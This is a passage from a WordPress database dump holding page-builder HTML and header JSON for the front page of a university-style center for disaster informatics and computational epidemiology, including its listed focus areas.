data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-329-outer style-local-20-c24-outer\">\n <div data-colibri-id=\"20-c24\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-329 style-local-20-c24 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c25\" class=\"h-global-transition-all h-heading style-330 style-local-20-c25 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-330 style-local-20-c25\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',20,'https://gsudice.dataconn.net/?p=396',0,'revision','',0),(397,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:34:57','2022-02-16 18:34:57','',23,'https://gsudice.dataconn.net/?p=397',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (398,1,'2022-02-16 18:34:57','2022-02-16 18:34:57','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" 